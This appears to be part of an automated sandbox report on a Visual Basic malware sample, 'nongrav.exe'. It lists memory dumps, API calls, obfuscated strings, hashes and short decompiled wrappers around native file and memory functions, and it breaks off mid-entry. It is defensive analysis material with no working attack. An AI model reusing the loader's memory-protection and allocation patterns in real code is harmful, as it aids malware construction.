Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CopyList$#512#522#523#525#527#629#709
String ID: JURYLESS$Lionisables5$PHONOCARDIOGRAMME$SIKSAKKENDES$Unstaggered6$renummererer$valkeler
API String ID: 3254860574-4034370320
Opcode ID: e9bc6fa72084d144f86e9d5d94420c95dfde6c69b37ad7a7c09cc1d475c80df4
Instruction ID: b83fdf7733101d76648dd69ee11910e5551982623077cfcb5eb3fd358b6e6d10
Opcode Fuzzy Hash: e9bc6fa72084d144f86e9d5d94420c95dfde6c69b37ad7a7c09cc1d475c80df4
Instruction Fuzzy Hash: 2551E975D002499BDB04DFD4DD89ADEBFB8BF58300F10412AE506B72A0DBB41689CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040469E, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

#652.MSVBVM60(?,?,66106831,660E6C30,660E1929), ref: 00414AF8
__vbaVarTstEq.MSVBVM60(?,?), ref: 00414B14
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00414B27
#539.MSVBVM60(00000002,0000008F,00000086,00000007), ref: 00414B4B
__vbaStrVarMove.MSVBVM60(00000002), ref: 00414B55
__vbaStrMove.MSVBVM60 ref: 00414B5C
__vbaStrCopy.MSVBVM60 ref: 00414B66
__vbaFreeStr.MSVBVM60 ref: 00414B6F
__vbaFreeVar.MSVBVM60 ref: 00414B74
__vbaVarDup.MSVBVM60 ref: 00414B8E
#666.MSVBVM60(?,00000002), ref: 00414B9C
__vbaVarCat.MSVBVM60(?,00008008,?), ref: 00414BBC
__vbaStrVarMove.MSVBVM60(00000000), ref: 00414BC3
__vbaStrMove.MSVBVM60 ref: 00414BCA
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000001,00000000), ref: 00414BD3
__vbaFreeStr.MSVBVM60 ref: 00414BDC
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,?), ref: 00414BEC
#611.MSVBVM60 ref: 00414BF5
__vbaStrMove.MSVBVM60 ref: 00414C00
__vbaPut3.MSVBVM60(00000000,?,00000001), ref: 00414C0A
__vbaFreeStr.MSVBVM60 ref: 00414C13
__vbaFileClose.MSVBVM60(00000001), ref: 00414C17

Strings

Rebukeful4, xrefs: 00414B06
\TUN5jvHxLZYIkcVn6S8g8Zy7vgIRN6j34, xrefs: 00414BAE
tmp, xrefs: 00414B80

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$FileList$#539#611#652#666CloseCopyOpenPut3
String ID: Rebukeful4$\TUN5jvHxLZYIkcVn6S8g8Zy7vgIRN6j34$tmp
API String ID: 1642154090-2505050908
Opcode ID: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
Instruction ID: db7d2b6c2fd00e66f80999167363a440dad08cd3fdb0f31befbf95a8ee7b4795
Opcode Fuzzy Hash: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
Instruction Fuzzy Hash: C851EDB1D002099FDB04DFA4D948ADEBBB8FF48704F10C12AE616B72A0EB745549CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004161C0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 00416221
#520.MSVBVM60(?,?), ref: 0041622F
__vbaStrVarMove.MSVBVM60(?), ref: 00416239
__vbaStrMove.MSVBVM60 ref: 00416244
__vbaStrCopy.MSVBVM60 ref: 00416252
__vbaFreeStr.MSVBVM60 ref: 00416257
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00416267
__vbaVarDup.MSVBVM60 ref: 00416284
#520.MSVBVM60(?,?), ref: 00416292
__vbaStrVarMove.MSVBVM60(?), ref: 0041629C
__vbaStrMove.MSVBVM60 ref: 004162A7
__vbaStrCopy.MSVBVM60 ref: 004162B5
__vbaFreeStr.MSVBVM60 ref: 004162BA
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004162CA
__vbaErrorOverflow.MSVBVM60 ref: 0041631D

Strings

GRADEREDE, xrefs: 00416276

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#520CopyList$ErrorOverflow
String ID: GRADEREDE
API String ID: 2203838927-682219593
Opcode ID: 45b15a2fda6961a2d9578a2592590381a4175f4bcb62b224ec72ca802e860bae
Instruction ID: 439dcb989c78c0bb19f891265363c32df97838b40bc21f39f376b841b869b029
Opcode Fuzzy Hash: 45b15a2fda6961a2d9578a2592590381a4175f4bcb62b224ec72ca802e860bae
Instruction Fuzzy Hash: B551EAB1D00209EFDB04DFA4D985ADEBFB8FF08740F14412AE506B6290E7745589CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004157B0, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004157FF
#598.MSVBVM60 ref: 00415801
#519.MSVBVM60(KUVERTEN), ref: 0041580C
__vbaStrMove.MSVBVM60 ref: 0041581D
__vbaStrMove.MSVBVM60(000000F2,?), ref: 0041583F
#631.MSVBVM60(00000000), ref: 00415842
#528.MSVBVM60(?,?), ref: 0041585A
#520.MSVBVM60(?,?), ref: 00415868
__vbaStrVarMove.MSVBVM60(?), ref: 00415872
__vbaStrMove.MSVBVM60 ref: 0041587D
__vbaStrCopy.MSVBVM60 ref: 0041588A
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041589A
__vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,?,?), ref: 004158B2
__vbaFreeStr.MSVBVM60(004158FC), ref: 004158F5

Strings

KUVERTEN, xrefs: 00415807
2, xrefs: 0041582E

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$CopyList$#519#520#528#598#631
String ID: 2$KUVERTEN
API String ID: 860267153-160717622
Opcode ID: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
Instruction ID: 04481c4492307c2e4da7a75cfd4f4fa401a31a651229871e0efee2cbbbd0db22
Opcode Fuzzy Hash: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
Instruction Fuzzy Hash: 5F31D6B1C10229EFCB04DFD4DD89AEEBBB8FB58700F10412AE506B7660DB745649CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004046AB, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(660E6BEC,660E6C30,660E1929), ref: 00414D03
#607.MSVBVM60(?,00000064,?), ref: 00414D13
__vbaStrVarMove.MSVBVM60(?), ref: 00414D1D
__vbaStrMove.MSVBVM60 ref: 00414D24
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414D30
#709.MSVBVM60(Shammock6,Amerindians9,000000FF,00000000), ref: 00414D47
#525.MSVBVM60(0000004C), ref: 00414D54
__vbaStrMove.MSVBVM60 ref: 00414D5F
#512.MSVBVM60(Eneboerskens,00000090), ref: 00414D6B
__vbaStrMove.MSVBVM60 ref: 00414D76
__vbaStrCopy.MSVBVM60 ref: 00414D7D
__vbaFreeStr.MSVBVM60 ref: 00414D86
#586.MSVBVM60(00000000,403B0000), ref: 00414D93
__vbaFreeStr.MSVBVM60(00414DE6,660E6BEC,660E6C30,660E1929), ref: 00414DDE
__vbaFreeStr.MSVBVM60 ref: 00414DE3

Strings

Amerindians9, xrefs: 00414D3D
Eneboerskens, xrefs: 00414D66
Shammock6, xrefs: 00414D42

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#512#525#586#607#709CopyList
String ID: Amerindians9$Eneboerskens$Shammock6
API String ID: 1315283285-3851144993
Opcode ID: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
Instruction ID: 47d39b2c0a556e7bda706f640f223120ad4fb53459ba33679d4ace5d1b409952
Opcode Fuzzy Hash: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
Instruction Fuzzy Hash: C2315070E00209EFC714DFA4DA49BDEBBB4BB48300F10812AE516B36A0EB746545CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(66106DF6,00000000,00000008), ref: 004160BD
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 004160D5
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,0000004C), ref: 004160FA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402E68,00000028), ref: 0041611A
__vbaFreeObj.MSVBVM60 ref: 00416123
#610.MSVBVM60(?), ref: 0041612D
#552.MSVBVM60(?,?,00000001), ref: 0041613D
__vbaVarMove.MSVBVM60 ref: 0041614F
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041615F
__vbaFreeStr.MSVBVM60(0041619D), ref: 00416196

Strings

(j, xrefs: 00416168

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#552#610CopyListMoveNew2
String ID: (j
API String ID: 3895108431-2984457235
Opcode ID: 21b02cfadb8d0526b204535bbc5f1591e912534b628be68ed32a4ae9d93dde73
Instruction ID: 77b8e8a7850380d043e43de55d9c99e89a055a8e14bda7d1310aa77c294e9cf0
Opcode Fuzzy Hash: 21b02cfadb8d0526b204535bbc5f1591e912534b628be68ed32a4ae9d93dde73
Instruction Fuzzy Hash: F3316C71D40205ABCB04DFA5DD49EEEBBB8EF58701F10802AF511B72A0D7786589CF99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nongrav.exe PID: 4520 Parent PID: 6136 nongrav.exeCOMMON

Executed Functions

Function 0041867C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
NtReadFile.NTDLL(b=A,?,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,?,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186A2, 004186B0
!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CreateRead
String ID: !:A$b=A$b=A
API String ID: 3388366904-704622139
Opcode ID: 814bae435c4d82792ef654be701cc0bf7de2c70f1b5524ffde98051c99b7406a
Instruction ID: fc5bea58bc1d9d3db1e11ac85c417a62abeaa590913897b2b5073321e61bf4b9
Opcode Fuzzy Hash: 814bae435c4d82792ef654be701cc0bf7de2c70f1b5524ffde98051c99b7406a
Instruction Fuzzy Hash: 3501F6B2200208ABDB18DF89DC85DEB77ADEF8C754F05824DFE4D93241CA34E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,?,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,?,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186A2, 004186B0
!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 5397ea5bdd59cc439ae72b42f5519e86338832593f98dae6125b9265ee613aa8
Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
Opcode Fuzzy Hash: 5397ea5bdd59cc439ae72b42f5519e86338832593f98dae6125b9265ee613aa8
Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00527AB1, Relevance: 3.0, APIs: 2, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00527AE2

Memory Dump Source

Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 35466a62842d6c3d452dcbba01eb6370ba49b22441b4555bcc5dcbf436c76725
Instruction ID: 4c8da8bb1c6e78fed2e5c14dbf6123a9eaa319d0ecd46a3b157b5a17b91797cb
Opcode Fuzzy Hash: 35466a62842d6c3d452dcbba01eb6370ba49b22441b4555bcc5dcbf436c76725
Instruction Fuzzy Hash: A6118EB05447149FE700CF20D94DFD67BA5AF1A7A5F168289AE511B0F6D7A88680CF12

Uniqueness

Uniqueness Score: -1.00%

Function 005279BE, Relevance: 1.6, APIs: 1, Instructions: 72nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00527A4F

Memory Dump Source

Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f5d789059c493548bb127886e54eae194f6669bb69396ab2d37cfebb0b2e3ac3
Instruction ID: 152f9315a974a119776be92b794e521584297c8946d0f70e24596938c74dd622
Opcode Fuzzy Hash: f5d789059c493548bb127886e54eae194f6669bb69396ab2d37cfebb0b2e3ac3
Instruction Fuzzy Hash: 751154B12003155FDB00DF789A89B8B3A29FF5A7E0F5543A6DD4A8B1E6E324D881C515

Uniqueness

Uniqueness Score: -1.00%

Function 005279B9, Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00527A4F

Memory Dump Source

Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 2360741de48f358e568c5ef7b02216a56e211c38dbd11e700d373cea9d4e7b50
Instruction ID: 16ea019150d93442f273581169ead6cfa937aa5b36361a47626e73187789b109
Opcode Fuzzy Hash: 2360741de48f358e568c5ef7b02216a56e211c38dbd11e700d373cea9d4e7b50
Instruction Fuzzy Hash: 9D1153B06003265FD710EF68C9C9B4B3A28FF8A3B0B5643AADC46970E6E720D881C615

Uniqueness

Uniqueness Score: -1.00%

Function 004185CD, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 844b699f726916c3da095aa0dd351c46a4ec63a69d9a8655cef342f3bdf9747e
Instruction ID: c7c963e9c9ffe9ebc317613d403a0a3f01ad1047f461a56b469918a03c429eef
Opcode Fuzzy Hash: 844b699f726916c3da095aa0dd351c46a4ec63a69d9a8655cef342f3bdf9747e
Instruction Fuzzy Hash: 0501B6B2201208ABDB08CF88DC95DEB77E9AF8C754F158248FA1D97241C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c49b7080193a95fe0d5b7dc67530f3f9e889f126ac260e0010dfebc7febf0e48
Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
Opcode Fuzzy Hash: c49b7080193a95fe0d5b7dc67530f3f9e889f126ac260e0010dfebc7febf0e48
Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00527AE7, Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-0000101C,-00000018), ref: 00527B57

Memory Dump Source

Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8c6f62ea7f4352498ad16fa9c96fafc6dd4e4a025d785a3fc410f4fd7699c526
Instruction ID: fa41090c0fa323c07e33d7f7e6cef0e1d5ab89b42493eac22be38ec093e8a17d
Opcode Fuzzy Hash: 8c6f62ea7f4352498ad16fa9c96fafc6dd4e4a025d785a3fc410f4fd7699c526
Instruction Fuzzy Hash: E3F0B4B14457009FF7058E21DD0DBE677A5AF293B6F118288AC515B0F9D7B9C6808F52

Uniqueness

Uniqueness Score: -1.00%

Function 00418622, Relevance: 1.5, APIs: 1, Instructions: 31filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
Instruction ID: 3a37cc489ca2f65b9e5cd4cff20079687d9055bb82a6973eaac54395a5a57be9
Opcode Fuzzy Hash: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
Instruction Fuzzy Hash: 94F0D4B2604149AFCB14DFACD994DDB77AAEF8C300B148649FA8887205C631E8558BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187AA(void* __eax, signed int __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				signed int _v117;
				long _t18;
				void* _t26;

				_v117 = _v117 ^ __edx;
				_t14 = _a4;
				E004191D0(_t26, _a4, _a4 + 0xc60,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t18;
			}

0x004187af
0x004187b3
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,?,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6faa13729a203f040356a4449dcc7cabcbc04d02c878f7296972ef6c99afa063
Instruction ID: fa62749528135fe0792dc5cc05633dbc6fea34fba145ebb65239203964924846
Opcode Fuzzy Hash: 6faa13729a203f040356a4449dcc7cabcbc04d02c878f7296972ef6c99afa063
Instruction Fuzzy Hash: 5AF01CB5200209BFDB14DF99CC85EEB7BA9AF88354F15824DFE0D97251C671E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				E004191D0(_t21, _a4, _a4 + 0xc60,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,?,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b0db4e99121070ee69e830765904451bf2c1ec762a52895565c51028c1c83436
Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
Opcode Fuzzy Hash: b0db4e99121070ee69e830765904451bf2c1ec762a52895565c51028c1c83436
Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1EB096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB096EA

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7152312ff493efd1f3463ca422fb83251d8b9a2f466d0d84ca4a2cf1321075c2
Instruction ID: fbffd392c3054295de286f870ed741930e985d333f35e773befb0cbc1d95f591
Opcode Fuzzy Hash: 7152312ff493efd1f3463ca422fb83251d8b9a2f466d0d84ca4a2cf1321075c2
Instruction Fuzzy Hash: 6C90027160109802D110725A940474E080557D0752F95C925E4414A18D86D588A17161

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB09A2A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e67dbba58d73536a6954e5bed31e07979ba1dc8d201a27b9333b0562913a03e
Instruction ID: 56b78cd69be00e9e276e9266c52f292972abab6d763b21afc571a327a7476f27
Opcode Fuzzy Hash: 9e67dbba58d73536a6954e5bed31e07979ba1dc8d201a27b9333b0562913a03e
Instruction Fuzzy Hash: 0F900261A01010424140726A984490A48057BE1662791C635E0988910D8599887566A5

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB09A0A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ed988c312be0bad4730135d004fa758c8336f7a1f4d92ff91eaf67364ced96a
Instruction ID: a799c7122c916885d8c6c6297534f02a3c994af47d070414d7f3bdbdbbd50543
Opcode Fuzzy Hash: 9ed988c312be0bad4730135d004fa758c8336f7a1f4d92ff91eaf67364ced96a
Instruction Fuzzy Hash: 5B90027160141402D100725A581470F080557D0753F91C525E1154915D8665886175B1

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0966A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9207e04d2f7cf791a7e8b80eb487db570495c760c8d8b43040f78ff1454fe31e
Instruction ID: e591d4b8c62765e3957604794eecf1a49dcffb2baec772adb3cd638a8f1981e5
Opcode Fuzzy Hash: 9207e04d2f7cf791a7e8b80eb487db570495c760c8d8b43040f78ff1454fe31e
